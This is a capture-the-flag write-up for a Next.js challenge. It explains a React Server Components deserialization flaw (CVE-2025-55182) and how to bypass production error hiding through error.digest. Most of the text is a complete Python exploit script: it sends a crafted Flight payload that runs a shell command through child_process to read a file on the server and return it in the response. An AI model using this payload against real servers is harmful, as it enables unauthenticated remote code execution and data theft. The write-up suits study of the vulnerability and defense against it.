File Analysis#

• page.tsx: A static landing page. No visible forms, API calls, or user input handling.
• Dockerfile: Sets ENV NODE_ENV=production. Copies the flag to flag.txt.
• package.json:
  • Name: "react2shell" (A strong hint towards RCE)
  • Dependencies: "next": "16.0.6" and "react": "^19"

The version 16.0.6 for Next.js is futuristic (as of late 2024/early 2025), suggesting a specific vulnerability is the target.

CVE-2025-55182 - React Server Components RCE via Flight Payload Deserialization#

The application is vulnerable to a critical Remote Code Execution (RCE) flaw in the React Server Components (RSC) “Flight” protocol. This vulnerability allows an unauthenticated attacker to execute arbitrary code on the server by sending a crafted malicious payload during the deserialization process.

The Mechanism#

1. Deserialization Gadget: The attacker sends a JSON payload that React attempts to deserialize.
2. Hijacked then: The payload includes an object that mimics a Promise (a “thenable”).
3. Code Execution: When React tries to resolve this fake promise, it executes a function defined in the payload (via _formData and the Function constructor).

The Obstacle: Production Mode#

The server runs in production mode, which suppresses detailed error messages. If we simply execute code, we might get a 500 error but no output.

The Bypass: error.digest#

Next.js has a specific behavior for error handling: if an error object thrown on the server has a digest property, that property’s value is sent to the client in the HTTP response, even in production. We can use this to exfiltrate the flag.

Exploit Script#

This Python script sends the malicious payload. It executes a command to read the flag, attaches the flag content to an error’s digest, and throws the error.

1
import requests
2
import json
3

4
# Target URL
5
url = "http://target:port"
6

7
# Payload Command:
8
# 1. Read the flag file using child_process.
9
# 2. Create a new Error object.
10
# 3. Set the 'digest' property to the flag content.
11
# 4. Throw the error to force Next.js to return the flag in the response.
12
cmd = """
13
var flag = process.mainModule.require('child_process').execSync('cat /app/flag.txt').toString();
14
var e = new Error('Exploit');
15
e.digest = flag.trim();
16
throw e;
17
"""
18

19
# Minify command to single line for JSON injection
20
cmd = cmd.replace('\n', ' ')
21

22
# Malicious JSON Object
23
# This structure triggers the CVE-2025-55182 deserialization flaw
24
payload_obj = {
25
    "then": "$1:__proto__:then",
26
    "status": "resolved_model",
27
    "reason": -1,
28
    "value": "{\"then\":\"$B1337\"}",
29
    "_response": {
30
        "_prefix": cmd,
31
        "_formData": {
32
            "get": "$1:constructor:constructor"
33
        }
34
    }
35
}
36

37
# Multipart body with cross-reference ($@0) to trigger deserialization
38
files = {
39
    '0': (None, json.dumps(payload_obj)),
40
    '1': (None, '"$@0"')
41
}
42

43
# The Next-Action header is required to hit the vulnerable code path
44
headers = {
45
    'Next-Action': 'x'
46
}
47

48
print(f"[*] Sending exploit to {url}...")
49

50
try:
51
    response = requests.post(url, files=files, headers=headers)
52
    print(f"[*] Status Code: {response.status_code}")
53
    print("[*] Response Body:")
54
    print(response.text)
55
except Exception as e:
56
    print(f"[!] Error: {e}")